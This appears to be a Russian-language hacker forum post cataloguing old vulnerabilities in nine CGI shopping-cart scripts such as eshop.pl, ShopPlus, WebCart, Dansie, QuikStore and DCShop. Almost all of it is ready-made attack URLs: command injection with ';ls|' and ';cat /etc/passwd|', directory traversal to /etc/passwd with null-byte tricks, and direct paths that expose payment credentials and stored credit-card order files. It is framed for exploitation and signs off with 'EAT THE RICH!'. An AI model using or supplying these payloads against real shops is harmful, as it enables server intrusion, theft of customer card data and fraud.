|
Продолжаем
наше изучение багов популярных в недалеком прошлом торговых
тележках.
В этот раз мы в начале расмотрим тележки которые позволяли
выполнять произвольные команды, а после и другие вкусности. №
1-м у нас пойдет (e)shop Online-Shop System от Webdiscount.net скрипт
не фильтрует символы конвеера(;) и пейапа (|):
www.xxx.com/cgi-bin/eshop.pl?seite=;ls| №
2 Hassan Consulting's Shoping cart [shop.cgi]от Hassan Consulting. то
же самое:
www.xxx.com/cgi-local/shop.pl/page=|ls|
www.xxx.com/cgi-local/shop.pl/page=;ls| к
сожалению в версиях 4 и выше Hassan Consulting's Shoping
cart этот баг уже отсутсвует, но есть другая проблема, при
запросе www.xxx.com/cgi-local/shop.pl можно узнать версию
торговой тележки и путь до скрипта. №
3 ShopPlus Cart то
же самое, отсутсвует проверка на вводимые символы:
www.xxx.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
www.xxx.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| №
4 multi-shop 1.06 Вместо
template файла можно указать любую команду.
www.xxx.com/cgi-bin/mshop2?product_template=;ls|&show_items=1&config_file=
picodirect.co.uk_mshop2.conf&user_notebooks=note_envoy №
5 WebCart от Mountain Network Systems выполняем
удаленные команды:
www.xxx.com/cgi-bin/webcart.cgi?CONFIG=moutain&CHANGE=YESNEXTPAGE=;ls|&CODE=PHOLD Далее
расматриваем другие уязвимости №
6 Dansie Shopping Cart 3.04 Multiple Vulnerabilities Добавление
в конец определенных переменных и значений к http://target/cgi-bin/cart.pl?
позволит отдаленным пользователям исполнять некоторые действия.
"Vars" отобразит параметры
настройки конфигурации приложения, которое включает имя
пользователя и пароль, используемый
для сделок кредитной карточки. Параметры настройки Окружающей
среды могут быть получены,
используя "env".
Строка "db" перечислит полный файл базы данных,
содержащий все предметы в shopping cart.
www.xxx.com/cgi-bin/cart.pl?vars
www.xxx.com/cgi-bin/cart.pl?env
www.xxx.com/cgi-bin/cart.pl?db №
7 ShopCartCGI v 2.3 изъян
позволяет удаленному пользователю просматривать файлы на
сервере:
www.xxx.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd
www.xxx.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd №
8 QuikStore Shopping Cart Удаленный
пользователь может просматривать файлы на системе:
www.xxx.com/quikstore.cgi?blah&template=../../. ./../../../../../../../etc/passwd%00.html
www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/hosts
www.xxx.com/quikstore.cgi?blah&t emplate=../../../../../../../../../../../../usr/bin/id| №
9 DCShop Electronic Shopping Cart Целый
набор багов:
www.xxx.com/cgi-bin/DCShop/Orders/orders.txt - информация
о кредитках в старых версиях тележки просматривалась так.
www.xxx.com/cgi-bin/DCShop/dcshop_admin.cgi?action=view_orders
- выдает инфу о кредитках в некоторых новых версиях.
Твой
bug Durito.
_________________
EAT THE RICH! | 